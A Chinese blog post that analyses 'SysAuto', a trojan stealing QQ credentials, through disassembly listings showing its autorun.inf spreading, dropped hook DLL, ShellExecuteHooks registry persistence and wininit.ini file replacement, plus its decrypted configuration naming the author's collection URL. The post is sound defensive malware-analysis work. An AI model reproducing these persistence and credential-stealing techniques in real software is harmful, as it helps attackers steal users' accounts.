SysAuto病毒簡單分析（一個盜QQ木馬）

首先用PEID查看是用UPX加殼，脫掉後顯示爲Delphi。

從文件最後讀出文件大小（已加密），XOR解密後得到真正的文件大小。

下面是簡單的分析過程：

將病毒文件及啓動文件autorun.inf複製到E盤，然後設置文件隱藏屬性

0040484C /$ 55 push ebp

0040484D |. 8BEC mov ebp,esp

0040484F |. 6A 00 push 0

00404851 |. 6A 00 push 0

00404853 |. 33C0 xor eax,eax

00404855 |. 55 push ebp

00404856 |. 68 02494000 push SysAuto1.00404902

0040485B |. 64:FF30 push dword ptr fs:[eax]

0040485E |. 64:8920 mov dword ptr fs:[eax],esp

00404861 |. 8D55 FC lea edx,dword ptr ss:[ebp-4]

00404864 |. B8 18494000 mov eax,SysAuto1.00404918 ; ASCII "E:/"

00404869 |. E8 86FEFFFF call SysAuto1.004046F4

0040486E |. 68 80000000 push 80 ; /FileAttributes = NORMAL

00404873 |. 68 1C494000 push SysAuto1.0040491C ; |FileName = "E:/SysAuto.exe"

00404878 |. E8 BFFBFFFF call <jmp.&KERNEL32.SetFileAttributesA>; /SetFileAttributesA

0040487D |. 68 1C494000 push SysAuto1.0040491C ; /FileName = "E:/SysAuto.exe"

00404882 |. E8 25FBFFFF call <jmp.&KERNEL32.DeleteFileA> ; /DeleteFileA

00404887 |. 6A 00 push 0

00404889 |. 68 1C494000 push SysAuto1.0040491C ; ASCII "E:/SysAuto.exe"

0040488E |. 8D55 F8 lea edx,dword ptr ss:[ebp-8]

00404891 |. 33C0 xor eax,eax

00404893 |. E8 F0E1FFFF call SysAuto1.00402A88

00404898 |. 8B45 F8 mov eax,dword ptr ss:[ebp-8]

0040489B |. E8 E4EEFFFF call SysAuto1.00403784

004048A0 |. 50 push eax ; |ExistingFileName

004048A1 |. E8 F6FAFFFF call <jmp.&KERNEL32.CopyFileA> ; /CopyFileA

004048A6 |. BA 34494000 mov edx,SysAuto1.00404934

004048AB |. B8 98494000 mov eax,SysAuto1.00404998 ; ASCII "E:/AutoRun.Inf"

004048B0 |. E8 EB030000 call SysAuto1.00404CA0

004048B5 |. 6A 06 push 6 ; /FileAttributes = HIDDEN|SYSTEM

004048B7 |. 68 1C494000 push SysAuto1.0040491C ; |FileName = "E:/SysAuto.exe"

004048BC |. E8 7BFBFFFF call <jmp.&KERNEL32.SetFileAttributesA>; /SetFileAttributesA

004048C1 |. BA B0494000 mov edx,SysAuto1.004049B0 ; ASCII "Proc"

004048C6 |. B8 18494000 mov eax,SysAuto1.00404918 ; ASCII "E:/"

004048CB |. E8 5CFFFFFF call SysAuto1.0040482C

004048D0 |. 68 F4010000 push 1F4 ; /Timeout = 500. ms

004048D5 |. E8 82FBFFFF call <jmp.&KERNEL32.Sleep> ; /Sleep

004048DA |. 8B55 FC mov edx,dword ptr ss:[ebp-4]

004048DD |. B8 18494000 mov eax,SysAuto1.00404918 ; ASCII "E:/"

004048E2 |. E8 45FFFFFF call SysAuto1.0040482C

004048E7 |. 33C0 xor eax,eax

004048E9 |. 5A pop edx

004048EA |. 59 pop ecx

004048EB |. 59 pop ecx

004048EC |. 64:8910 mov dword ptr fs:[eax],edx

004048EF |. 68 09494000 push SysAuto1.00404909

004048F4 |> 8D45 F8 lea eax,dword ptr ss:[ebp-8]

004048F7 |. BA 02000000 mov edx,2

004048FC |. E8 27ECFFFF call SysAuto1.00403528

00404901 /. C3 retn

創建autorun.inf文件

00404CA0 /$ 53 push ebx

00404CA1 |. 56 push esi

00404CA2 |. 57 push edi

00404CA3 |. 51 push ecx

00404CA4 |. 8BF2 mov esi,edx

00404CA6 |. 8BD8 mov ebx,eax

00404CA8 |. 33FF xor edi,edi

00404CAA |. 6A 00 push 0

00404CAC |. 6A 06 push 6

00404CAE |. 6A 02 push 2

00404CB0 |. 6A 00 push 0

00404CB2 |. 6A 03 push 3

00404CB4 |. 68 000000C0 push C0000000

00404CB9 |. 8BC3 mov eax,ebx

00404CBB |. E8 C4EAFFFF call SysAuto1.00403784

00404CC0 |. 50 push eax ; |FileName

00404CC1 |. E8 DEF6FFFF call <jmp.&KERNEL32.CreateFileA> ; /CreateFileA

00404CC6 |. 8BD8 mov ebx,eax

00404CC8 |. 83FB FF cmp ebx,-1

00404CCB |. 74 2C je short SysAuto1.00404CF9

00404CCD |. 6A 00 push 0

00404CCF |. 8D4424 04 lea eax,dword ptr ss:[esp+4]

00404CD3 |. 50 push eax

00404CD4 |. 8BC6 mov eax,esi

00404CD6 |. E8 45E9FFFF call SysAuto1.00403620

00404CDB |. 50 push eax

00404CDC |. 8BC6 mov eax,esi

00404CDE |. E8 A1EAFFFF call SysAuto1.00403784

00404CE3 |. 50 push eax ; |Buffer

00404CE4 |. 53 push ebx ; |hFile

00404CE5 |. E8 7AF7FFFF call <jmp.&KERNEL32.WriteFile> ; /WriteFile

00404CEA |. 53 push ebx ; /hFile

00404CEB |. E8 44F7FFFF call <jmp.&KERNEL32.SetEndOfFile> ; /SetEndOfFile

00404CF0 |. 53 push ebx ; /hObject

00404CF1 |. E8 9EF6FFFF call <jmp.&KERNEL32.CloseHandle> ; /CloseHandle

00404CF6 |. 83CF FF or edi,FFFFFFFF

00404CF9 |> 8BC7 mov eax,edi

00404CFB |. 5A pop edx

00404CFC |. 5F pop edi

00404CFD |. 5E pop esi

00404CFE |. 5B pop ebx

00404CFF /. C3 retn

向C:/Program Files/Internet Explorer/PLUGINS/複製文件System64.Sys

00405719 |. A1 C8604000 mov eax,dword ptr ds:[4060C8]

0040571E |. 8B00 mov eax,dword ptr ds:[eax]

00405720 |. E8 5FE0FFFF call SysAuto1.00403784

00405725 |. 50 push eax

00405726 |. 8D55 D4 lea edx,dword ptr ss:[ebp-2C]

00405729 |. A1 C4604000 mov eax,dword ptr ds:[4060C4]

0040572E |. E8 85F2FFFF call SysAuto1.004049B8

00405733 |. 8B45 D4 mov eax,dword ptr ss:[ebp-2C]

00405736 |. E8 49E0FFFF call SysAuto1.00403784

0040573B |. 50 push eax ; |String1

0040573C |. E8 33EDFFFF call <jmp.&KERNEL32.lstrcmpiA> ; /lstrcmpiA

00405741 |. 85C0 test eax,eax

00405743 |. 74 5D je short SysAuto1.004057A2

00405745 |. 8B0D C8604000 mov ecx,dword ptr ds:[4060C8] ; SysAuto1.004060AC

0040574B |. 8B09 mov ecx,dword ptr ds:[ecx]

0040574D |. A1 C8604000 mov eax,dword ptr ds:[4060C8]

00405752 |. 8B15 C4764000 mov edx,dword ptr ds:[4076C4]

00405758 |. E8 0FDFFFFF call SysAuto1.0040366C

0040575D |. A1 C8604000 mov eax,dword ptr ds:[4060C8]

00405762 |. 8B00 mov eax,dword ptr ds:[eax]

00405764 |. E8 1BE0FFFF call SysAuto1.00403784

00405769 |. 50 push eax ; /FileName

0040576A |. E8 3DECFFFF call <jmp.&KERNEL32.DeleteFileA> ; /DeleteFileA

0040576F |. 6A 00 push 0

00405771 |. A1 C8604000 mov eax,dword ptr ds:[4060C8]

00405776 |. 8B00 mov eax,dword ptr ds:[eax]

00405778 |. E8 07E0FFFF call SysAuto1.00403784

0040577D |. 50 push eax

0040577E |. A1 C4604000 mov eax,dword ptr ds:[4060C4]

00405783 |. E8 FCDFFFFF call SysAuto1.00403784

00405788 |. 50 push eax ; |ExistingFileName

00405789 |. E8 0EECFFFF call <jmp.&KERNEL32.CopyFileA> ; /CopyFileA

0040578E |. 6A 06 push 6

00405790 |. A1 C8604000 mov eax,dword ptr ds:[4060C8]

00405795 |. 8B00 mov eax,dword ptr ds:[eax]

00405797 |. E8 E8DFFFFF call SysAuto1.00403784

0040579C |. 50 push eax ; |FileName

0040579D |. E8 9AECFFFF call <jmp.&KERNEL32.SetFileAttributes>; /SetFileAttributesA

004057A2 |> B8 C0764000 mov eax,SysAuto1.004076C0

004057A7 |. B9 74594000 mov ecx,SysAuto1.00405974 ; ASCII "System64.Tao"

004057AC |. 8B15 C4764000 mov edx,dword ptr ds:[4076C4]

004057B2 |. E8 B5DEFFFF call SysAuto1.0040366C

004057B7 |. B8 C8764000 mov eax,SysAuto1.004076C8

004057BC |. B9 8C594000 mov ecx,SysAuto1.0040598C ; ASCII "System64.Sys"

004057C1 |. 8B15 C4764000 mov edx,dword ptr ds:[4076C4]

004057C7 |. E8 A0DEFFFF call SysAuto1.0040366C

004057CC |. A1 C8764000 mov eax,dword ptr ds:[4076C8]

004057D1 |. E8 AEDFFFFF call SysAuto1.00403784

004057D6 |. 8BD8 mov ebx,eax

004057D8 |. 53 push ebx ; /FileName = "C:/Program Files/Internet Explorer/PLUGINS/System64.Sys"

004057D9 |. E8 CEEBFFFF call <jmp.&KERNEL32.DeleteFileA> ; /DeleteFileA

004057DE |. 53 push ebx ; /Path

004057DF |. E8 44EEFFFF call <jmp.&shlwapi.PathFileExistsA> ; /PathFileExistsA

判斷文件是否存在，如果不存在，從資源中取出

004057E4 |. 85C0 test eax,eax

004057E6 |. 74 33 je short SysAuto1.0040581B

004057E8 |. A1 CC764000 mov eax,dword ptr ds:[4076CC]

004057ED |. 50 push eax

004057EE |. A1 C0764000 mov eax,dword ptr ds:[4076C0]

004057F3 |. E8 8CDFFFFF call SysAuto1.00403784

004057F8 |. 8BC8 mov ecx,eax ; |

004057FA |. BA 9C594000 mov edx,SysAuto1.0040599C ; |ASCII "FILE"

004057FF |. B8 0A000000 mov eax,0A ; |

00405804 |. E8 37F2FFFF call SysAuto1.00404A40 ; /SysAuto1.00404A40

00405809 |. 8B15 C0764000 mov edx,dword ptr ds:[4076C0]

0040580F |. A1 C8764000 mov eax,dword ptr ds:[4076C8]

00405814 |. E8 57F6FFFF call SysAuto1.00404E70

00405819 |. EB 17 jmp short SysAuto1.00405832

0040581B |> A1 CC764000 mov eax,dword ptr ds:[4076CC]

00405820 |. 50 push eax ; /Arg1 => 009B02B4

00405821 |. 8BCB mov ecx,ebx ; |

00405823 |. BA 9C594000 mov edx,SysAuto1.0040599C ; |ASCII "FILE"

00405828 |. B8 0A000000 mov eax,0A ; |

0040582D |. E8 0EF2FFFF call SysAuto1.00404A40 ; /SysAuto1.00404A40

00405832 |> BA A4594000 mov edx,SysAuto1.004059A4 ; ASCII "yyyrt8jjjk9bjko"

00405837 |. 33C0 xor eax,eax

00405839 |. E8 C2F1FFFF call SysAuto1.00404A00

0040583E |. 85C0 test eax,eax

00405840 |. 0F85 AF000000 jnz SysAuto1.004058F5

00405846 |. BA B4594000 mov edx,SysAuto1.004059B4 ; ASCII "xxkxxxxjtrj8jok"

0040584B |. 33C0 xor eax,eax

0040584D |. E8 AEF1FFFF call SysAuto1.00404A00

00405852 |. 85C0 test eax,eax

00405854 |. 0F85 9B000000 jnz SysAuto1.004058F5

0040585A |. 6A 00 push 0 ; /Arg8 = 00000000

0040585C |. 6A 00 push 0 ; |Arg7 = 00000000

0040585E |. 6A 00 push 0 ; |Arg6 = 00000000

00405860 |. 6A 00 push 0 ; |Arg5 = 00000000

00405862 |. 6A 00 push 0 ; |Arg4 = 00000000

00405864 |. 6A 00 push 0 ; |Arg3 = 00000000

00405866 |. A1 50764000 mov eax,dword ptr ds:[407650] ; |

0040586B |. 50 push eax ; |Arg2 => 00400000 ASCII "MZP"

0040586C |. 6A 00 push 0 ; |Arg1 = 00000000

0040586E |. BA A4594000 mov edx,SysAuto1.004059A4 ; |ASCII "yyyrt8jjjk9bjko"

00405873 |. B8 C4594000 mov eax,SysAuto1.004059C4 ; |ASCII "Edit"

00405878 |. 33C9 xor ecx,ecx ; |

0040587A |. E8 7DFCFFFF call SysAuto1.004054FC ; /SysAuto1.004054FC

0040587F |. 53 push ebx ; /FileName

00405880 |. E8 87EBFFFF call <jmp.&KERNEL32.LoadLibraryA> ; /LoadLibraryA

00405885 |. 8BD8 mov ebx,eax

00405887 |. 85DB test ebx,ebx

00405889 |. 74 6A je short SysAuto1.004058F5

0040588B |. 68 CC594000 push SysAuto1.004059CC ; /ProcNameOrOrdinal = "MsgHookOff"

00405890 |. 53 push ebx ; |hModule

00405891 |. E8 4EEBFFFF call <jmp.&KERNEL32.GetProcAddress> ; /GetProcAddress

00405896 |. A3 D0764000 mov dword ptr ds:[4076D0],eax

0040589B |. 68 D8594000 push SysAuto1.004059D8 ; /ProcNameOrOrdinal = "MsgHookOn"

004058A0 |. 53 push ebx ; |hModule

004058A1 |. E8 3EEBFFFF call <jmp.&KERNEL32.GetProcAddress> ; /GetProcAddress

004058A6 |. A3 D4764000 mov dword ptr ds:[4076D4],eax

004058AB |. 833D D0764000>cmp dword ptr ds:[4076D0],0

004058B2 |. 74 41 je short SysAuto1.004058F5

004058B4 |. 833D D4764000>cmp dword ptr ds:[4076D4],0

004058BB |. 74 38 je short SysAuto1.004058F5

004058BD |. FF15 D4764000 call dword ptr ds:[4076D4]

004058C3 |. EB 06 jmp short SysAuto1.004058CB

004058C5 |> 56 /push esi ; /pMsg

004058C6 |. E8 C9EBFFFF |call <jmp.&user32.DispatchMessageA> ; /DispatchMessageA

004058CB |> 6A 00 push 0 ; /MsgFilterMax = 0

004058CD |. 6A 00 |push 0 ; |MsgFilterMin = 0

004058CF |. 6A 00 |push 0 ; |hWnd = NULL

004058D1 |. 56 |push esi ; |pMsg

004058D2 |. E8 D5EBFFFF |call <jmp.&user32.GetMessageA> ; /GetMessageA

004058D7 |. 85C0 |test eax,eax

004058D9 |.^ 75 EA /jnz short SysAuto1.004058C5

004058DB |. FF15 D0764000 call dword ptr ds:[4076D0]

004058E1 |. 6A 00 push 0 ; /hWnd = NULL

004058E3 |. E8 9CEBFFFF call <jmp.&user32.CloseWindow> ; /CloseWindow

004058E8 |. 53 push ebx ; /hLibModule

004058E9 |. E8 CEEAFFFF call <jmp.&KERNEL32.FreeLibrary> ; /FreeLibrary

004058EE |. 6A 00 push 0 ; /hWnd = NULL

004058F0 |. E8 8FEBFFFF call <jmp.&user32.CloseWindow> ; /CloseWindow

004058F5 |> 68 E4594000 push SysAuto1.004059E4 ; /Arg1 = 004059E4

004058FA |. B9 E8594000 mov ecx,SysAuto1.004059E8 ; |ASCII "{754FB7D8-B8FE-4810-B363-A788CD060F1F}"

004058FF |. BA 105A4000 mov edx,SysAuto1.00405A10 ; |ASCII "SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/ShellExecuteHooks"

00405904 |. B8 02000080 mov eax,80000002 ; |

00405909 |. E8 F2F3FFFF call SysAuto1.00404D00 ; /SysAuto1.00404D00

0040590E |. A1 C8764000 mov eax,dword ptr ds:[4076C8]

00405913 |. E8 6CDEFFFF call SysAuto1.00403784

00405918 |. 50 push eax ; /Arg1

00405919 |. E8 42F4FFFF call SysAuto1.00404D60 ; /SysAuto1.00404D60

0040591E |> 33C0 xor eax,eax

00405920 |. 5A pop edx

00405921 |. 59 pop ecx

00405922 |. 59 pop ecx

00405923 |. 64:8910 mov dword ptr fs:[eax],edx

00405926 |. 68 40594000 push SysAuto1.00405940

0040592B |> 8D45 D4 lea eax,dword ptr ss:[ebp-2C]

0040592E |. BA 07000000 mov edx,7

00405933 |. E8 F0DBFFFF call SysAuto1.00403528

00405938 /. C3 retn

從資源中取出system64.sys

00404A40 /$ 55 push ebp

00404A41 |. 8BEC mov ebp,esp

00404A43 |. 83C4 F4 add esp,-0C

00404A46 |. 53 push ebx

00404A47 |. 56 push esi

00404A48 |. 57 push edi

00404A49 |. 894D FC mov dword ptr ss:[ebp-4],ecx

00404A4C |. 8BF2 mov esi,edx

00404A4E |. 8BD8 mov ebx,eax

00404A50 |. 837D 08 00 cmp dword ptr ss:[ebp+8],0

00404A54 |. 0F84 B3000000 je SysAuto1.00404B0D

00404A5A |. 53 push ebx ; /ResourceType

00404A5B |. 56 push esi ; |ResourceName

00404A5C |. A1 50764000 mov eax,dword ptr ds:[407650] ; |

00404A61 |. 50 push eax ; |hModule => 00400000 (SysAuto1)

00404A62 |. E8 4DF9FFFF call <jmp.&KERNEL32.FindResourc>; /FindResourceA

00404A67 |. 8BF8 mov edi,eax ; SysAuto1.0040C080

00404A69 |. 85FF test edi,edi

00404A6B |. 0F84 9C000000 je SysAuto1.00404B0D

00404A71 |. 57 push edi ; /hResource

00404A72 |. A1 50764000 mov eax,dword ptr ds:[407650] ; |

00404A77 |. 50 push eax ; |hModule => 00400000 (SysAuto1)

00404A78 |. E8 97F9FFFF call <jmp.&KERNEL32.LoadResourc>; /LoadResource

00404A7D |. 8BF0 mov esi,eax

00404A7F |. 85F6 test esi,esi

00404A81 |. 0F84 86000000 je SysAuto1.00404B0D

00404A87 |. 56 push esi ; /hResource

00404A88 |. E8 8FF9FFFF call <jmp.&KERNEL32.LockResourc>; /LockResource

00404A8D |. 8945 F4 mov dword ptr ss:[ebp-C],eax

00404A90 |. 837D F4 00 cmp dword ptr ss:[ebp-C],0

00404A94 |. 74 77 je short SysAuto1.00404B0D

00404A96 |. 6A 00 push 0 ; /hTemplateFile = NULL

00404A98 |. 6A 06 push 6 ; |Attributes = HIDDEN|SYSTEM

00404A9A |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS

00404A9C |. 6A 00 push 0 ; |pSecurity = NULL

00404A9E |. 6A 00 push 0 ; |ShareMode = 0

00404AA0 |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE

00404AA5 |. 8B45 FC mov eax,dword ptr ss:[ebp-4] ; |

00404AA8 |. 50 push eax ; |FileName

00404AA9 |. E8 F6F8FFFF call <jmp.&KERNEL32.CreateFileA>; /CreateFileA

00404AAE |. 8BD8 mov ebx,eax

00404AB0 |. 83FB FF cmp ebx,-1

00404AB3 |. 74 58 je short SysAuto1.00404B0D

00404AB5 |. 57 push edi ; /hResource

00404AB6 |. A1 50764000 mov eax,dword ptr ds:[407650] ; |

00404ABB |. 50 push eax ; |hModule => 00400000 (SysAuto1)

00404ABC |. E8 93F9FFFF call <jmp.&KERNEL32.SizeofResou>; /SizeofResource

00404AC1 |. 8BF8 mov edi,eax

00404AC3 |. 6A 00 push 0 ; /pOverlapped = NULL

00404AC5 |. 8D45 F8 lea eax,dword ptr ss:[ebp-8] ; |

00404AC8 |. 50 push eax ; |pBytesWritten

00404AC9 |. 57 push edi ; |nBytesToWrite

00404ACA |. 8B45 F4 mov eax,dword ptr ss:[ebp-C] ; |

00404ACD |. 50 push eax ; |Buffer

00404ACE |. 53 push ebx ; |hFile

00404ACF |. E8 90F9FFFF call <jmp.&KERNEL32.WriteFile> ; /WriteFile

00404AD4 |. 8B45 08 mov eax,dword ptr ss:[ebp+8]

00404AD7 |. E8 44EBFFFF call SysAuto1.00403620

00404ADC |. 8BF8 mov edi,eax

00404ADE |. 6A 00 push 0

00404AE0 |. 8D45 F8 lea eax,dword ptr ss:[ebp-8]

00404AE3 |. 50 push eax

00404AE4 |. 57 push edi

00404AE5 |. 8B45 08 mov eax,dword ptr ss:[ebp+8]

00404AE8 |. E8 97ECFFFF call SysAuto1.00403784

00404AED |. 50 push eax ; |Buffer

00404AEE |. 53 push ebx ; |hFile

00404AEF |. E8 70F9FFFF call <jmp.&KERNEL32.WriteFile> ; /WriteFile

00404AF4 |. 53 push ebx ; /hFile

00404AF5 |. E8 3AF9FFFF call <jmp.&KERNEL32.SetEndOfFil>; /SetEndOfFile

00404AFA |. 53 push ebx ; /hObject

00404AFB |. E8 94F8FFFF call <jmp.&KERNEL32.CloseHandle>; /CloseHandle

00404B00 |. 8BC6 mov eax,esi

00404B02 |. E8 B5F9FFFF call SysAuto1.004044BC

00404B07 |. 56 push esi ; /hResource

00404B08 |. E8 B7F8FFFF call <jmp.&KERNEL32.FreeResourc>; /FreeResource

00404B0D |> 5F pop edi

00404B0E |. 5E pop esi

00404B0F |. 5B pop ebx

00404B10 |. 8BE5 mov esp,ebp

00404B12 |. 5D pop ebp

00404B13 /. C2 0400 retn 4

修改註冊表進行文件啓動

00404D00 /$ 55 push ebp

00404D01 |. 8BEC mov ebp,esp

00404D03 |. 83C4 F8 add esp,-8

00404D06 |. 53 push ebx

00404D07 |. 56 push esi

00404D08 |. 8BF1 mov esi,ecx

00404D0A |. 8B5D 08 mov ebx,dword ptr ss:[ebp+8]

00404D0D |. 33C9 xor ecx,ecx

00404D0F |. 894D FC mov dword ptr ss:[ebp-4],ecx

00404D12 |. C745 F8 01000>mov dword ptr ss:[ebp-8],1

00404D19 |. 8D4D F8 lea ecx,dword ptr ss:[ebp-8]

00404D1C |. 51 push ecx ; /pDisposition

00404D1D |. 8D4D FC lea ecx,dword ptr ss:[ebp-4] ; |

00404D20 |. 51 push ecx ; |pHandle

00404D21 |. 6A 00 push 0 ; |pSecurity = NULL

00404D23 |. 68 3F000F00 push 0F003F ; |Access = KEY_ALL_ACCESS

00404D28 |. 6A 00 push 0 ; |Options = REG_OPTION_NON_VOLATILE

00404D2A |. 6A 00 push 0 ; |Class = NULL

00404D2C |. 6A 00 push 0 ; |Reserved = 0

00404D2E |. 52 push edx ; |Subkey

00404D2F |. 50 push eax ; |hKey

00404D30 |. E8 4FF6FFFF call <jmp.&advapi32.RegCreateKe>; /RegCreateKeyExA

00404D35 |. 53 push ebx ; /String = ""

00404D36 |. E8 41F7FFFF call <jmp.&KERNEL32.lstrlenA> ; /lstrlenA

00404D3B |. 40 inc eax

00404D3C |. 50 push eax ; /BufSize

00404D3D |. 53 push ebx ; |Buffer

00404D3E |. 6A 01 push 1 ; |ValueType = REG_SZ

00404D40 |. 6A 00 push 0 ; |Reserved = 0

00404D42 |. 56 push esi ; |ValueName

00404D43 |. 8B45 FC mov eax,dword ptr ss:[ebp-4] ; |

00404D46 |. 50 push eax ; |hKey

00404D47 |. E8 40F6FFFF call <jmp.&advapi32.RegSetValue>; /RegSetValueExA

00404D4C |. 8B45 FC mov eax,dword ptr ss:[ebp-4]

00404D4F |. 50 push eax ; /hKey

00404D50 |. E8 27F6FFFF call <jmp.&advapi32.RegCloseKey>; /RegCloseKey

00404D55 |. 5E pop esi

00404D56 |. 5B pop ebx

00404D57 |. 59 pop ecx

00404D58 |. 59 pop ecx

00404D59 |. 5D pop ebp

00404D5A /. C2 0400 retn 4

00404D5D 8D40 00 lea eax,dword ptr ds:[eax]

00404D60 /$ 55 push ebp

00404D61 |. 8BEC mov ebp,esp

00404D63 |. 53 push ebx

00404D64 |. BB 84764000 mov ebx,SysAuto1.00407684

00404D69 |. 8BC3 mov eax,ebx

00404D6B |. BA E44D4000 mov edx,SysAuto1.00404DE4 ; ASCII "CLSID/{754FB7D8-B8FE-4810-B363-A788CD060F1F}"

00404D70 |. E8 E3E7FFFF call SysAuto1.00403558

00404D75 |. 68 144E4000 push SysAuto1.00404E14

00404D7A |. 8B03 mov eax,dword ptr ds:[ebx]

00404D7C |. E8 03EAFFFF call SysAuto1.00403784

00404D81 |. 8BD0 mov edx,eax ; |

00404D83 |. B9 144E4000 mov ecx,SysAuto1.00404E14 ; |

00404D88 |. B8 00000080 mov eax,80000000 ; |

00404D8D |. E8 6EFFFFFF call SysAuto1.00404D00 ; /SysAuto1.00404D00

00404D92 |. 8BC3 mov eax,ebx

00404D94 |. BA 204E4000 mov edx,SysAuto1.00404E20 ; ASCII "/InProcServer32"

00404D99 |. E8 8AE8FFFF call SysAuto1.00403628

00404D9E |. 8B45 08 mov eax,dword ptr ss:[ebp+8]

00404DA1 |. 50 push eax

00404DA2 |. 8B03 mov eax,dword ptr ds:[ebx]

00404DA4 |. E8 DBE9FFFF call SysAuto1.00403784

00404DA9 |. 8BD0 mov edx,eax ; |

00404DAB |. B9 144E4000 mov ecx,SysAuto1.00404E14 ; |

00404DB0 |. B8 00000080 mov eax,80000000 ; |

00404DB5 |. E8 46FFFFFF call SysAuto1.00404D00 ; /SysAuto1.00404D00

00404DBA |. 68 304E4000 push SysAuto1.00404E30 ; ASCII "Apartment"

00404DBF |. 8B03 mov eax,dword ptr ds:[ebx]

00404DC1 |. E8 BEE9FFFF call SysAuto1.00403784

00404DC6 |. 8BD0 mov edx,eax ; |

00404DC8 |. B9 3C4E4000 mov ecx,SysAuto1.00404E3C ; |ASCII "ThreadingModel"

00404DCD |. B8 00000080 mov eax,80000000 ; |

00404DD2 |. E8 29FFFFFF call SysAuto1.00404D00 ; /SysAuto1.00404D00

00404DD7 |. 5B pop ebx

00404DD8 |. 5D pop ebp

00404DD9 /. C2 0400 retn 4

根據操作系統版本修改wininit.ini的內容

00404E4C /$ 81C4 6CFFFFFF add esp,-94

00404E52 |. C70424 940000>mov dword ptr ss:[esp],94

00404E59 |. 54 push esp ; /pVersionInformation

00404E5A |. E8 9DF5FFFF call <jmp.&KERNEL32.GetVersionE>; /GetVersionExA

00404E5F |. 837C24 10 02 cmp dword ptr ss:[esp+10],2

00404E64 |. 0F95C0 setne al

00404E67 |. 81C4 94000000 add esp,94

00404E6D /. C3 retn

00404E6E 8BC0 mov eax,eax

00404E70 /$ 53 push ebx

00404E71 |. 56 push esi

00404E72 |. 81C4 F4FDFFFF add esp,-20C

00404E78 |. 8BF2 mov esi,edx

00404E7A |. 8BD8 mov ebx,eax

00404E7C |. E8 CBFFFFFF call SysAuto1.00404E4C

00404E81 |. 84C0 test al,al

00404E83 |. 74 4F je short SysAuto1.00404ED4

00404E85 |. 68 04010000 push 104

00404E8A |. 8D8424 090100>lea eax,dword ptr ss:[esp+109]

00404E91 |. 50 push eax

00404E92 |. 8BC6 mov eax,esi

00404E94 |. E8 EBE8FFFF call SysAuto1.00403784

00404E99 |. 50 push eax ; |LongPath

00404E9A |. E8 4DF5FFFF call <jmp.&KERNEL32.GetShortPat>; /GetShortPathNameA

00404E9F |. 68 04010000 push 104

00404EA4 |. 8D4424 04 lea eax,dword ptr ss:[esp+4]

00404EA8 |. 50 push eax

00404EA9 |. 8BC3 mov eax,ebx

00404EAB |. E8 D4E8FFFF call SysAuto1.00403784

00404EB0 |. 50 push eax ; |LongPath

00404EB1 |. E8 36F5FFFF call <jmp.&KERNEL32.GetShortPat>; /GetShortPathNameA

00404EB6 |. 68 F44E4000 push SysAuto1.00404EF4 ; /FileName = "wininit.ini"

00404EBB |. 8D8424 090100>lea eax,dword ptr ss:[esp+109] ; |

00404EC2 |. 50 push eax ; |String

00404EC3 |. 8D4424 08 lea eax,dword ptr ss:[esp+8] ; |

00404EC7 |. 50 push eax ; |Key

00404EC8 |. 68 004F4000 push SysAuto1.00404F00 ; |Section = "rename"

00404ECD |. E8 9AF5FFFF call <jmp.&KERNEL32.WritePrivat>; /WritePrivateProfileStringA

00404ED2 |. EB 17 jmp short SysAuto1.00404EEB

00404ED4 |> 6A 05 push 5

00404ED6 |. 8BC3 mov eax,ebx

00404ED8 |. E8 A7E8FFFF call SysAuto1.00403784

00404EDD |. 50 push eax

00404EDE |. 8BC6 mov eax,esi

00404EE0 |. E8 9FE8FFFF call SysAuto1.00403784

00404EE5 |. 50 push eax ; |ExistingName

00404EE6 |. E8 39F5FFFF call <jmp.&KERNEL32.MoveFileExA>; /MoveFileExA

00404EEB |> 81C4 0C020000 add esp,20C

00404EF1 |. 5E pop esi

00404EF2 |. 5B pop ebx

00404EF3 /. C3 retn

中間還有一段是解密作者隱藏的數據，下面是解密出的數據

解密出病毒作者的網址及其他數據

009B002F 00 CB FB B4 F3 D2 AF 0D 0A 32 30 30 他大爺..200

009B003F 37 2D 36 2D 39 20 31 35 3A 32 34 3A 32 36 0D 0A 7-6-9 15:24:26..

009B004F 36 34 32 43 32 42 33 35 0D 0A 4B 65 79 5F 4B 65 642C2B35..Key_Ke

009B005F 79 0D 0A 36 30 0D 0A 59 65 73 0D 0A 59 65 73 0D y..60..Yes..Yes.

009B006F 0A 59 65 73 0D 0A 68 74 74 70 3A 2F 2F 77 77 77 .Yes..http://www

009B007F 2E 70 6C 69 6E 63 65 2E 6E 65 74 2F 58 58 2F 6E .plince.net/XX/n

009B008F 6E 2E 61 73 70 0D 0A 78 78 78 78 0D 0A 68 74 74 n.asp..xxxx..htt

009B009F 70 3A 2F 2F 77 77 77 2E 70 6C 69 6E 63 65 2E 6E p://www.plince.n

009B00AF 65 74 2F 58 58 2F 6E 6E 2E 61 73 70 0D 0A 17 E3 et/XX/nn.asp..

SysAuto病毒簡單分析（一個盜QQ木馬）

DAPPER 事務 TRANSACTION

去除Microsoft Visual studio 2008 beta2的過期限制

Microsoft windows internals 學習筆記（3）

security cookie的一點分析

Microsoft windows internals 學習筆記（1）

java實現圖片瀏覽：java核心技術學習

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結